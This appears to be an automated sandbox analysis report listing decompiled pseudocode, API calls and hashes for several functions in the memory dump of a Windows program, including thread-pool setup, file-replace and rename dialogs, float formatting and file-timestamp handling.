%c:\, xrefs: 0026B1D4

Memory Dump Source

Source File: 00000004.00000002.480056994.0000000000261000.00000020.00020000.sdmp, Offset: 00260000, based on PE: true

Associated: 00000004.00000002.480050872.0000000000260000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.480088820.0000000000292000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.480163517.000000000029D000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480195856.00000000002A4000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480231143.00000000002C0000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480241061.00000000002C1000.00000002.00020000.sdmp Download File

Similarity

API ID: _wcschr$__vswprintf_c_l_swprintf
String ID: %c:\
API String ID: 525462905-3142399695
Opcode ID: bdb40d6247e69437aa63930110265ae0ee0376fd4c5bc1b387ccbbfcfe29d0b3
Instruction ID: f51b83a43b5107866127d0d719ac6eda86af0349b390e1bf37956951b42a41a7
Opcode Fuzzy Hash: bdb40d6247e69437aa63930110265ae0ee0376fd4c5bc1b387ccbbfcfe29d0b3
Instruction Fuzzy Hash: B601D6275313127A9A217B659C96D6FA7ECDE56760750440AFC44C2082FB30D8F4C6B1

Uniqueness

Uniqueness Score: -1.00%

Function 00270326, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 60
COMMON

Download Yara Rule

C-Code - Quality: 74%

			E00270326(long* __ecx, long _a4) {
				void* __esi;
				void* __ebp;
				long _t11;
				void* _t14;
				long _t23;
				long* _t25;

				_t19 = __ecx;
				_t11 = _a4;
				_t25 = __ecx;
				_t23 = 0x40;
				 *__ecx = _t11;
				if(_t11 > _t23) {
					 *__ecx = _t23;
				}
				if( *_t25 == 0) {
					 *_t25 = 1;
				}
				_t25[0x41] = 0;
				if( *_t25 > _t23) {
					 *_t25 = _t23;
				}
				_t3 =  &(_t25[0xc8]); // 0x320
				_t25[0xc5] = 0;
				InitializeCriticalSection(_t3);
				_t25[0xc6] = CreateSemaphoreW(0, 0, _t23, 0);
				_t14 = CreateEventW(0, 1, 1, 0);
				_t25[0xc7] = _t14;
				if(_t25[0xc6] == 0 || _t14 == 0) {
					_push(L"\nThread pool initialization failed.");
					_push(0x2a00e0);
					E00266CC9(E00266CCE(_t19), 0x2a00e0, _t25, 2);
				}
				_t25[0xc3] = 0;
				_t25[0xc4] = 0;
				_t25[0x42] = 0;
				return _t25;
			}

0x00270326
0x00270326
0x0027032e
0x00270332
0x00270333
0x00270337
0x00270339
0x00270339
0x00270342
0x00270344
0x00270344
0x00270346
0x0027034e
0x00270350
0x00270350
0x00270352
0x00270358
0x0027035f
0x00270373
0x00270379
0x0027037f
0x0027038b
0x00270391
0x0027039b
0x002703a7
0x002703a7
0x002703ad
0x002703b5
0x002703bb
0x002703c4

APIs

InitializeCriticalSection.KERNEL32(00000320,00000000,?,?,?,0026A865,00000008,00000000,?,?,0026C802,?,00000000,?,00000001,?), ref: 0027035F
CreateSemaphoreW.KERNEL32 ref: 00270369
CreateEventW.KERNEL32(00000000,00000001,00000001,00000000,?,?,?,0026A865,00000008,00000000,?,?,0026C802,?,00000000), ref: 00270379

Strings

Thread pool initialization failed., xrefs: 00270391

Memory Dump Source

Source File: 00000004.00000002.480056994.0000000000261000.00000020.00020000.sdmp, Offset: 00260000, based on PE: true

Associated: 00000004.00000002.480050872.0000000000260000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.480088820.0000000000292000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.480163517.000000000029D000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480195856.00000000002A4000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480231143.00000000002C0000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480241061.00000000002C1000.00000002.00020000.sdmp Download File

Similarity

API ID: Create$CriticalEventInitializeSectionSemaphore
String ID: Thread pool initialization failed.
API String ID: 3340455307-2182114853
Opcode ID: 1f768ae9631ce4b13e4b01d18d0c70c5eb5085761f21b9ead3cf5c0e6509a872
Instruction ID: 9c4bc414c50b028389a50fda94fbc9d5f874659b2c7117a3485bfaa1f3ae2ee9
Opcode Fuzzy Hash: 1f768ae9631ce4b13e4b01d18d0c70c5eb5085761f21b9ead3cf5c0e6509a872
Instruction Fuzzy Hash: D31170B1520709EFC3215F66DCC9AABFBECEB65354F10482EF1DE82201D6712994CB60

Uniqueness

Uniqueness Score: -1.00%

Function 0027C96E, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 46
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0027C96E(long _a4, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				long _v0;
				_Unknown_base(*)()* _t16;
				int _t22;
				WCHAR* _t25;

				 *0x2bce10 = _a12;
				 *0x2bce14 = _a16;
				 *0x2a75f4 = _a20;
				if( *0x2a75d3 == 0) {
					if( *0x2a75d2 == 0) {
						_t16 = E0027AFB9;
						_t25 = L"REPLACEFILEDLG";
						while(1) {
							_t22 = DialogBoxParamW( *0x2a0064, _t25,  *0x2a75c8, _t16, _a4);
							if(_t22 != 4) {
								break;
							}
							if(DialogBoxParamW( *0x2a0060, L"RENAMEDLG",  *0x2a75d8, E0027C2A7, _v0) != 0) {
								break;
							}
						}
						return _t22;
					}
					return 1;
				}
				return 0;
			}

0x0027c979
0x0027c982
0x0027c98b
0x0027c990
0x0027c99d
0x0027c9ae
0x0027c9b3
0x0027c9da
0x0027c9ee
0x0027c9f3
0x00000000
0x00000000
0x0027c9d8
0x00000000
0x00000000
0x0027c9d8
0x00000000
0x0027c9fa
0x00000000
0x0027c9a1
0x00000000

Strings

REPLACEFILEDLG, xrefs: 0027C9B3, 0027C9E5
RENAMEDLG, xrefs: 0027C9C9

Memory Dump Source

Source File: 00000004.00000002.480056994.0000000000261000.00000020.00020000.sdmp, Offset: 00260000, based on PE: true

Associated: 00000004.00000002.480050872.0000000000260000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.480088820.0000000000292000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.480163517.000000000029D000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480195856.00000000002A4000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480231143.00000000002C0000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480241061.00000000002C1000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID: RENAMEDLG$REPLACEFILEDLG
API String ID: 0-56093855
Opcode ID: 1c388d9c79e19df4220e8136d3fc4183be7bdd8f123ad544f74e28bca9c36f18
Instruction ID: 3d0df9de1598e82eee8997039109acf9fad71984cc9b5f4c9e4edfbc00381f7d
Opcode Fuzzy Hash: 1c388d9c79e19df4220e8136d3fc4183be7bdd8f123ad544f74e28bca9c36f18
Instruction Fuzzy Hash: 1C01B572628206EFC741DF65FD48A27BBE9E746750F10442AFA49A2230DA719C309B65

Uniqueness

Uniqueness Score: -1.00%

Function 00288749, Relevance: 6.3, APIs: 4, Instructions: 305
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E00288749(void* __edx, signed int* _a4, signed int _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, signed int _a24, signed int _a28, intOrPtr _a32, intOrPtr _a36) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				unsigned int _v20;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				char _v40;
				intOrPtr _v48;
				char _v52;
				void* __ebx;
				void* __edi;
				void* _t86;
				signed int _t92;
				signed int _t93;
				signed int _t94;
				signed int _t100;
				void* _t101;
				void* _t102;
				void* _t104;
				void* _t107;
				void* _t109;
				void* _t111;
				void* _t115;
				char* _t116;
				void* _t119;
				signed int _t121;
				signed int _t128;
				signed int* _t129;
				signed int _t136;
				signed int _t137;
				char _t138;
				signed int _t139;
				signed int _t142;
				signed int _t146;
				signed int _t151;
				char _t156;
				char _t157;
				void* _t161;
				unsigned int _t162;
				signed int _t164;
				signed int _t166;
				signed int _t170;
				void* _t171;
				signed int* _t172;
				signed int _t174;
				signed int _t181;
				signed int _t182;
				signed int _t183;
				signed int _t184;
				signed int _t185;
				signed int _t186;
				signed int _t187;

				_t171 = __edx;
				_t181 = _a24;
				if(_t181 < 0) {
					_t181 = 0;
				}
				_t184 = _a8;
				 *_t184 = 0;
				E00283356(0,  &_v52, _t171, _a36);
				_t5 = _t181 + 0xb; // 0xb
				if(_a12 > _t5) {
					_t172 = _a4;
					_t142 = _t172[1];
					_v36 =  *_t172;
					__eflags = (_t142 >> 0x00000014 & 0x000007ff) - 0x7ff;
					if((_t142 >> 0x00000014 & 0x000007ff) != 0x7ff) {
						L11:
						__eflags = _t142 & 0x80000000;
						if((_t142 & 0x80000000) != 0) {
							 *_t184 = 0x2d;
							_t184 = _t184 + 1;
							__eflags = _t184;
						}
						__eflags = _a28;
						_v16 = 0x3ff;
						_t136 = ((0 | _a28 == 0x00000000) - 0x00000001 & 0xffffffe0) + 0x27;
						__eflags = _t172[1] & 0x7ff00000;
						_v32 = _t136;
						_t86 = 0x30;
						if((_t172[1] & 0x7ff00000) != 0) {
							 *_t184 = 0x31;
							_t185 = _t184 + 1;
							__eflags = _t185;
						} else {
							 *_t184 = _t86;
							_t185 = _t184 + 1;
							_t164 =  *_t172 | _t172[1] & 0x000fffff;
							__eflags = _t164;
							if(_t164 != 0) {
								_v16 = 0x3fe;
							} else {
								_v16 = _v16 & _t164;
							}
						}
						_t146 = _t185;
						_t186 = _t185 + 1;
						_v28 = _t146;
						__eflags = _t181;
						if(_t181 != 0) {
							 *_t146 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v48 + 0x88))))));
						} else {
							 *_t146 = 0;
						}
						_t92 = _t172[1] & 0x000fffff;
						__eflags = _t92;
						_v20 = _t92;
						if(_t92 > 0) {
							L23:
							_t33 =  &_v8;
							 *_t33 = _v8 & 0x00000000;
							__eflags =  *_t33;
							_t147 = 0xf0000;
							_t93 = 0x30;
							_v12 = _t93;
							_v20 = 0xf0000;
							do {
								__eflags = _t181;
								if(_t181 <= 0) {
									break;
								}
								_t119 = E0027DAC0( *_t172 & _v8, _v12, _t172[1] & _t147 & 0x000fffff);
								_t161 = 0x30;
								_t121 = _t119 + _t161 & 0x0000ffff;
								__eflags = _t121 - 0x39;
								if(_t121 > 0x39) {
									_t121 = _t121 + _t136;
									__eflags = _t121;
								}
								_t162 = _v20;
								_t172 = _a4;
								 *_t186 = _t121;
								_t186 = _t186 + 1;
								_v8 = (_t162 << 0x00000020 | _v8) >> 4;
								_t147 = _t162 >> 4;
								_t93 = _v12 - 4;
								_t181 = _t181 - 1;
								_v20 = _t162 >> 4;
								_v12 = _t93;
								__eflags = _t93;
							} while (_t93 >= 0);
							__eflags = _t93;
							if(_t93 < 0) {
								goto L39;
							}
							_t115 = E0027DAC0( *_t172 & _v8, _v12, _t172[1] & _t147 & 0x000fffff);
							__eflags = _t115 - 8;
							if(_t115 <= 8) {
								goto L39;
							}
							_t54 = _t186 - 1; // 0x283fc1
							_t116 = _t54;
							_t138 = 0x30;
							while(1) {
								_t156 =  *_t116;
								__eflags = _t156 - 0x66;
								if(_t156 == 0x66) {
									goto L33;
								}
								__eflags = _t156 - 0x46;
								if(_t156 != 0x46) {
									_t139 = _v32;
									__eflags = _t116 - _v28;
									if(_t116 == _v28) {
										_t57 = _t116 - 1;
										 *_t57 =  *(_t116 - 1) + 1;
										__eflags =  *_t57;
									} else {
										_t157 =  *_t116;
										__eflags = _t157 - 0x39;
										if(_t157 != 0x39) {
											 *_t116 = _t157 + 1;
										} else {
											 *_t116 = _t139 + 0x3a;
										}
									}
									goto L39;
								}
								L33:
								 *_t116 = _t138;
								_t116 = _t116 - 1;
							}
						} else {
							__eflags =  *_t172;
							if( *_t172 <= 0) {
								L39:
								__eflags = _t181;
								if(_t181 > 0) {
									_push(_t181);
									_t111 = 0x30;
									_push(_t111);
									_push(_t186);
									E0027E920(_t181);
									_t186 = _t186 + _t181;
									__eflags = _t186;
								}
								_t94 = _v28;
								__eflags =  *_t94;
								if( *_t94 == 0) {
									_t186 = _t94;
								}
								__eflags = _a28;
								 *_t186 = ((_t94 & 0xffffff00 | _a28 == 0x00000000) - 0x00000001 & 0x000000e0) + 0x70;
								_t174 = _a4[1];
								_t100 = E0027DAC0( *_a4, 0x34, _t174);
								_t137 = 0;
								_t151 = (_t100 & 0x000007ff) - _v16;
								__eflags = _t151;
								asm("sbb ebx, ebx");
								if(__eflags < 0) {
									L47:
									 *(_t186 + 1) = 0x2d;
									_t187 = _t186 + 2;
									__eflags = _t187;
									_t151 =  ~_t151;
									asm("adc ebx, 0x0");
									_t137 =  ~_t137;
									goto L48;
								} else {
									if(__eflags > 0) {
										L46:
										 *(_t186 + 1) = 0x2b;
										_t187 = _t186 + 2;
										L48:
										_t182 = _t187;
										_t101 = 0x30;
										 *_t187 = _t101;
										__eflags = _t137;
										if(__eflags < 0) {
											L56:
											__eflags = _t187 - _t182;
											if(_t187 != _t182) {
												L60:
												_push(0);
												_push(0xa);
												_push(_t137);
												_push(_t151);
												_t102 = E0027DE00();
												_v32 = _t174;
												 *_t187 = _t102 + 0x30;
												_t187 = _t187 + 1;
												__eflags = _t187;
												L61:
												_t104 = 0x30;
												_t183 = 0;
												__eflags = 0;
												 *_t187 = _t151 + _t104;
												 *(_t187 + 1) = 0;
												goto L62;
											}
											__eflags = _t137;
											if(__eflags < 0) {
												goto L61;
											}
											if(__eflags > 0) {
												goto L60;
											}
											__eflags = _t151 - 0xa;
											if(_t151 < 0xa) {
												goto L61;
											}
											goto L60;
										}
										if(__eflags > 0) {
											L51:
											_push(0);
											_push(0x3e8);
											_push(_t137);
											_push(_t151);
											_t107 = E0027DE00();
											_v32 = _t174;
											 *_t187 = _t107 + 0x30;
											_t187 = _t187 + 1;
											__eflags = _t187 - _t182;
											if(_t187 != _t182) {
												L55:
												_push(0);
												_push(0x64);
												_push(_t137);
												_push(_t151);
												_t109 = E0027DE00();
												_v32 = _t174;
												 *_t187 = _t109 + 0x30;
												_t187 = _t187 + 1;
												__eflags = _t187;
												goto L56;
											}
											L52:
											__eflags = _t137;
											if(__eflags < 0) {
												goto L56;
											}
											if(__eflags > 0) {
												goto L55;
											}
											__eflags = _t151 - 0x64;
											if(_t151 < 0x64) {
												goto L56;
											}
											goto L55;
										}
										__eflags = _t151 - 0x3e8;
										if(_t151 < 0x3e8) {
											goto L52;
										}
										goto L51;
									}
									__eflags = _t151;
									if(_t151 < 0) {
										goto L47;
									}
									goto L46;
								}
							}
							goto L23;
						}
					}
					__eflags = 0;
					if(0 != 0) {
						goto L11;
					} else {
						_t183 = E00288A4C(0, _t142, 0, _t172, _t184, _a12, _a16, _a20, _t181, 0, _a32, 0);
						__eflags = _t183;
						if(_t183 == 0) {
							_t128 = E00290FD0(_t184, 0x65);
							_pop(_t166);
							__eflags = _t128;
							if(_t128 != 0) {
								__eflags = _a28;
								_t170 = ((_t166 & 0xffffff00 | _a28 == 0x00000000) - 0x00000001 & 0x000000e0) + 0x70;
								__eflags = _t170;
								 *_t128 = _t170;
								 *((char*)(_t128 + 3)) = 0;
							}
							_t183 = 0;
						} else {
							 *_t184 = 0;
						}
						goto L62;
					}
				} else {
					_t129 = E00287ECC();
					_t183 = 0x22;
					 *_t129 = _t183;
					E00287DAB();
					L62:
					if(_v40 != 0) {
						 *(_v52 + 0x350) =  *(_v52 + 0x350) & 0xfffffffd;
					}
					return _t183;
				}
			}

0x00288749
0x00288754
0x0028875b
0x0028875d
0x0028875d
0x0028875f
0x00288768
0x0028876a
0x0028876f
0x00288775
0x0028878b
0x00288790
0x00288793
0x002887a0
0x002887a5
0x002887f9
0x00288801
0x00288803
0x00288805
0x00288808
0x00288808
0x00288808
0x0028880e
0x00288816
0x00288829
0x0028882c
0x0028882e
0x00288831
0x00288832
0x00288853
0x00288856
0x00288856
0x00288834
0x00288834
0x00288836
0x00288841
0x00288841
0x00288843
0x0028884a
0x00288845
0x00288845
0x00288845
0x00288843
0x00288857
0x00288859
0x0028885a
0x0028885d
0x0028885f
0x00288873
0x00288861
0x00288861
0x00288861
0x00288878
0x00288878
0x0028887d
0x00288880
0x0028888b
0x0028888b
0x0028888b
0x0028888b
0x0028888f
0x00288896
0x00288897
0x0028889a
0x0028889d
0x0028889d
0x0028889f
0x00000000
0x00000000
0x002888b7
0x002888be
0x002888c2
0x002888c5
0x002888c8
0x002888ca
0x002888ca
0x002888ca
0x002888cc
0x002888cf
0x002888d2
0x002888d4
0x002888dc
0x002888e2
0x002888e5
0x002888e8
0x002888e9
0x002888ec
0x002888ef
0x002888ef
0x002888f4
0x002888f7
0x00000000
0x00000000
0x0028890f
0x00288914
0x00288918
0x00000000
0x00000000
0x0028891c
0x0028891c
0x0028891f
0x00288920
0x00288920
0x00288922
0x00288925
0x00000000
0x00000000
0x00288927
0x0028892a
0x00288931
0x00288934
0x00288937
0x0028894d
0x0028894d
0x0028894d
0x00288939
0x00288939
0x0028893b
0x0028893e
0x00288949
0x00288940
0x00288943
0x00288943
0x0028893e
0x00000000
0x00288937
0x0028892c
0x0028892c
0x0028892e
0x0028892e
0x00288882
0x00288882
0x00288885
0x00288950
0x00288950
0x00288952
0x00288954
0x00288957
0x00288958
0x00288959
0x0028895a
0x00288962
0x00288962
0x00288962
0x00288964
0x00288967
0x0028896a
0x0028896c
0x0028896c
0x0028896e
0x00288980
0x00288984
0x00288987
0x0028898e
0x00288996
0x00288996
0x00288999
0x0028899b
0x002889ac
0x002889ac
0x002889b0
0x002889b0
0x002889b3
0x002889b5
0x002889b8
0x00000000
0x0028899d
0x0028899d
0x002889a3
0x002889a3
0x002889a7
0x002889ba
0x002889ba
0x002889be
0x002889bf
0x002889c1
0x002889c3
0x00288a04
0x00288a04
0x00288a06
0x00288a13
0x00288a13
0x00288a15
0x00288a17
0x00288a18
0x00288a19
0x00288a20
0x00288a23
0x00288a25
0x00288a25
0x00288a26
0x00288a28
0x00288a2b
0x00288a2b
0x00288a2d
0x00288a2f
0x00000000
0x00288a2f
0x00288a08
0x00288a0a
0x00000000
0x00000000
0x00288a0c
0x00000000
0x00000000
0x00288a0e
0x00288a11
0x00000000
0x00000000
0x00000000
0x00288a11
0x002889ca
0x002889d0
0x002889d0
0x002889d2
0x002889d3
0x002889d4
0x002889d5
0x002889dc
0x002889df
0x002889e1
0x002889e2
0x002889e4
0x002889f1
0x002889f1
0x002889f3
0x002889f5
0x002889f6
0x002889f7
0x002889fe
0x00288a01
0x00288a03
0x00288a03
0x00000000
0x00288a03
0x002889e6
0x002889e6
0x002889e8
0x00000000
0x00000000
0x002889ea
0x00000000
0x00000000
0x002889ec
0x002889ef
0x00000000
0x00000000
0x00000000
0x002889ef
0x002889cc
0x002889ce
0x00000000
0x00000000
0x00000000
0x002889ce
0x0028899f
0x002889a1
0x00000000
0x00000000
0x00000000
0x002889a1
0x0028899b
0x00000000
0x00288885
0x00288880
0x002887a7
0x002887a9
0x00000000
0x002887ab
0x002887c1
0x002887c6
0x002887c8
0x002887d4
0x002887da
0x002887db
0x002887dd
0x002887df
0x002887ea
0x002887ea
0x002887ed
0x002887ef
0x002887ef
0x002887f2
0x002887ca
0x002887ca
0x002887ca
0x00000000
0x002887c8
0x00288777
0x00288777
0x0028877e
0x0028877f
0x00288781
0x00288a33
0x00288a37
0x00288a3c
0x00288a3c
0x00288a4b
0x00288a4b

APIs

_strrchr.LIBCMT ref: 002887D4
__alldvrm.LIBCMT ref: 002889D5
__alldvrm.LIBCMT ref: 002889F7

Memory Dump Source

Source File: 00000004.00000002.480056994.0000000000261000.00000020.00020000.sdmp, Offset: 00260000, based on PE: true

Associated: 00000004.00000002.480050872.0000000000260000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.480088820.0000000000292000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.480163517.000000000029D000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480195856.00000000002A4000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480231143.00000000002C0000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480241061.00000000002C1000.00000002.00020000.sdmp Download File

Similarity

API ID: __alldvrm$_strrchr
String ID:
API String ID: 1036877536-0
Opcode ID: f2926f290b12bce643c0ba6d96074ca090c44e05cafcf7f54dcf12bfeb7df9bf
Instruction ID: 9e6e3bd1d811e21c63af3dc5fbaefd4efa5e09779577ac07e1872f53cd3366f1
Opcode Fuzzy Hash: f2926f290b12bce643c0ba6d96074ca090c44e05cafcf7f54dcf12bfeb7df9bf
Instruction Fuzzy Hash: 61A1783A9262879FDB25EF18C8417BEBBE5EF11310FA841ADD4849B3C2CA348951CB51

Uniqueness

Uniqueness Score: -1.00%

Function 00269F96, Relevance: 6.1, APIs: 4, Instructions: 127
filetimeCOMMON

Download Yara Rule

C-Code - Quality: 94%

			E00269F96(void* __edx) {
				signed char _t40;
				void* _t41;
				void* _t52;
				signed char _t70;
				void* _t79;
				signed int* _t81;
				signed int* _t84;
				void* _t85;
				signed int* _t88;
				void* _t90;

				_t79 = __edx;
				E0027D940();
				_t84 =  *(_t90 + 0x1038);
				_t70 = 1;
				if(_t84 == 0) {
					L2:
					 *(_t90 + 0x11) = 0;
					L3:
					_t81 =  *(_t90 + 0x1040);
					if(_t81 == 0) {
						L5:
						 *(_t90 + 0x13) = 0;
						L6:
						_t88 =  *(_t90 + 0x1044);
						if(_t88 == 0) {
							L8:
							 *(_t90 + 0x12) = 0;
							L9:
							_t40 = E00269E7F( *(_t90 + 0x1038));
							 *(_t90 + 0x18) = _t40;
							if(_t40 == 0xffffffff || (_t70 & _t40) == 0) {
								_t70 = 0;
							} else {
								E0026A12F( *((intOrPtr*)(_t90 + 0x103c)), 0);
							}
							_t41 = CreateFileW( *(_t90 + 0x1050), 0x40000000, 3, 0, 3, 0x2000000, 0);
							 *(_t90 + 0x14) = _t41;
							if(_t41 != 0xffffffff) {
								L16:
								if( *(_t90 + 0x11) != 0) {
									E0027082F(_t84, _t79, _t90 + 0x1c);
								}
								if( *(_t90 + 0x13) != 0) {
									E0027082F(_t81, _t79, _t90 + 0x2c);
								}
								if( *(_t90 + 0x12) != 0) {
									E0027082F(_t88, _t79, _t90 + 0x24);
								}
								_t85 =  *(_t90 + 0x14);
								asm("sbb eax, eax");
								asm("sbb eax, eax");
								asm("sbb eax, eax");
								SetFileTime(_t85,  ~( *(_t90 + 0x1b) & 0x000000ff) & _t90 + 0x00000030,  ~( *(_t90 + 0x16) & 0x000000ff) & _t90 + 0x00000024,  ~( *(_t90 + 0x11) & 0x000000ff) & _t90 + 0x0000001c);
								_t52 = CloseHandle(_t85);
								if(_t70 != 0) {
									_t52 = E0026A12F( *((intOrPtr*)(_t90 + 0x103c)),  *(_t90 + 0x18));
								}
								goto L24;
							} else {
								_t52 = E0026B32C( *(_t90 + 0x1040), _t90 + 0x38, 0x800);
								if(_t52 == 0) {
									L24:
									return _t52;
								}
								_t52 = CreateFileW(_t90 + 0x4c, 0x40000000, 3, 0, 3, 0x2000000, 0);
								 *(_t90 + 0x14) = _t52;
								if(_t52 == 0xffffffff) {
									goto L24;
								}
								goto L16;
							}
						}
						 *(_t90 + 0x12) = _t70;
						if(( *_t88 | _t88[1]) != 0) {
							goto L9;
						}
						goto L8;
					}
					 *(_t90 + 0x13) = _t70;
					if(( *_t81 | _t81[1]) != 0) {
						goto L6;
					}
					goto L5;
				}
				 *(_t90 + 0x11) = 1;
				if(( *_t84 | _t84[1]) != 0) {
					goto L3;
				}
				goto L2;
			}

0x00269f96
0x00269f9b
0x00269fa7
0x00269fae
0x00269fb2
0x00269fbf
0x00269fbf
0x00269fc3
0x00269fc3
0x00269fcc
0x00269fd9
0x00269fd9
0x00269fdd
0x00269fdd
0x00269fe6
0x00269ff4
0x00269ff4
0x00269ff8
0x00269fff
0x0026a004
0x0026a00b
0x0026a021
0x0026a011
0x0026a01a
0x0026a01a
0x0026a03c
0x0026a042
0x0026a049
0x0026a093
0x0026a098
0x0026a0a1
0x0026a0a1
0x0026a0ab
0x0026a0b4
0x0026a0b4
0x0026a0be
0x0026a0c7
0x0026a0c7
0x0026a0d7
0x0026a0db
0x0026a0eb
0x0026a0fb
0x0026a101
0x0026a108
0x0026a110
0x0026a11d
0x0026a11d
0x00000000
0x0026a04b
0x0026a05c
0x0026a063
0x0026a122
0x0026a12c
0x0026a12c
0x0026a080
0x0026a086
0x0026a08d
0x00000000
0x00000000
0x00000000
0x0026a08d
0x0026a049
0x00269fee
0x00269ff2
0x00000000
0x00000000
0x00000000
0x00269ff2
0x00269fd3
0x00269fd7
0x00000000
0x00000000
0x00000000
0x00269fd7
0x00269fb9
0x00269fbd
0x00000000
0x00000000
0x00000000

APIs

CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000), ref: 0026A03C
CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000), ref: 0026A080
SetFileTime.KERNEL32(?,00000800,?,00000000,?,00000000,?,00267F2C,?,?,?,?,?,?,?,?), ref: 0026A101
CloseHandle.KERNEL32(?), ref: 0026A108

Memory Dump Source

Source File: 00000004.00000002.480056994.0000000000261000.00000020.00020000.sdmp, Offset: 00260000, based on PE: true

Associated: 00000004.00000002.480050872.0000000000260000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.480088820.0000000000292000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.480163517.000000000029D000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480195856.00000000002A4000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480231143.00000000002C0000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480241061.00000000002C1000.00000002.00020000.sdmp Download File

Similarity

API ID: File$Create$CloseHandleTime
String ID:
API String ID: 2287278272-0
Opcode ID: 6d1bbd4b8aeb3f0d53a41fd20a3e8f8f8737926942fc1bce321c6bd796e2679f
Instruction ID: 4cd6102328c17a34b9458f65065557d5f36af7a8cdb0acdc2c6187772d9e0c84
Opcode Fuzzy Hash: 6d1bbd4b8aeb3f0d53a41fd20a3e8f8f8737926942fc1bce321c6bd796e2679f
Instruction Fuzzy Hash: FC41B130168382AAD721DF24DC85BAEB7E89B85300F040959B5D5E3181D674DA9CDF53

Uniqueness

Uniqueness Score: -1.00%

Function 0028B5EA, Relevance: 6.1, APIs: 4, Instructions: 110
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E0028B5EA(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, int _a8, char* _a12, int _a16, short* _a20, int _a24, intOrPtr _a28) {
				signed int _v8;
				int _v12;
				char _v16;
				intOrPtr _v24;
				char _v28;
				void* _v40;
				signed int _t34;
				signed int _t40;
				int _t46;
				int _t53;
				void* _t55;
				int _t57;
				signed int _t63;
				int _t67;
				short* _t69;
				signed int _t70;
				short* _t71;

				_t34 =  *0x29d668; // 0xd26a0a57
				_v8 = _t34 ^ _t70;
				E00283356(__ebx,  &_v28, __edx, _a4);
				_t57 = _a24;
				if(_t57 == 0) {
					_t6 = _v24 + 8; // 0x31e85006
					_t53 =  *_t6;
					_t57 = _t53;
					_a24 = _t53;
				}
				_t67 = 0;
				_t40 = MultiByteToWideChar(_t57, 1 + (0 | _a28 != 0x00000000) * 8, _a12, _a16, 0, 0);
				_v12 = _t40;
				if(_t40 == 0) {
					L15:
					if(_v16 != 0) {
						 *(_v28 + 0x350) =  *(_v28 + 0x350) & 0xfffffffd;
					}
					return E0027E203(_t67, _v8 ^ _t70);
				}
				_t55 = _t40 + _t40;
				asm("sbb eax, eax");
				if((_t55 + 0x00000008 & _t40) == 0) {
					_t69 = 0;
					L11:
					if(_t69 != 0) {
						E0027E920(_t67, _t69, _t67, _t55);
						_t46 = MultiByteToWideChar(_a24, 1, _a12, _a16, _t69, _v12);
						if(_t46 != 0) {
							_t67 = GetStringTypeW(_a8, _t69, _t46, _a20);
						}
					}
					L14:
					E0028980D(_t69);
					goto L15;
				}
				asm("sbb eax, eax");
				_t48 = _t40 & _t55 + 0x00000008;
				_t63 = _t55 + 8;
				if((_t40 & _t55 + 0x00000008) > 0x400) {
					asm("sbb eax, eax");
					_t69 = E00287A8A(_t63, _t48 & _t63);
					if(_t69 == 0) {
						goto L14;
					}
					 *_t69 = 0xdddd;
					L9:
					_t69 =  &(_t69[4]);
					goto L11;
				}
				asm("sbb eax, eax");
				E00290EE0();
				_t69 = _t71;
				if(_t69 == 0) {
					goto L14;
				}
				 *_t69 = 0xcccc;
				goto L9;
			}

0x0028b5f2
0x0028b5f9
0x0028b605
0x0028b60a
0x0028b60f
0x0028b614
0x0028b614
0x0028b617
0x0028b619
0x0028b619
0x0028b61e
0x0028b637
0x0028b63d
0x0028b642
0x0028b6e1
0x0028b6e5
0x0028b6ea
0x0028b6ea
0x0028b706
0x0028b706
0x0028b648
0x0028b650
0x0028b654
0x0028b6a0
0x0028b6a2
0x0028b6a4
0x0028b6a9
0x0028b6c0
0x0028b6c8
0x0028b6d8
0x0028b6d8
0x0028b6c8
0x0028b6da
0x0028b6db
0x00000000
0x0028b6e0
0x0028b65b
0x0028b65d
0x0028b65f
0x0028b667
0x0028b684
0x0028b68e
0x0028b693
0x00000000
0x00000000
0x0028b695
0x0028b69b
0x0028b69b
0x00000000
0x0028b69b
0x0028b66b
0x0028b66f
0x0028b674
0x0028b678
0x00000000
0x00000000
0x0028b67a
0x00000000

APIs

MultiByteToWideChar.KERNEL32(?,00000000,?,002834E6,00000000,00000000,0028451B,?,0028451B,?,00000001,002834E6,?,00000001,0028451B,0028451B), ref: 0028B637
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0028B6C0
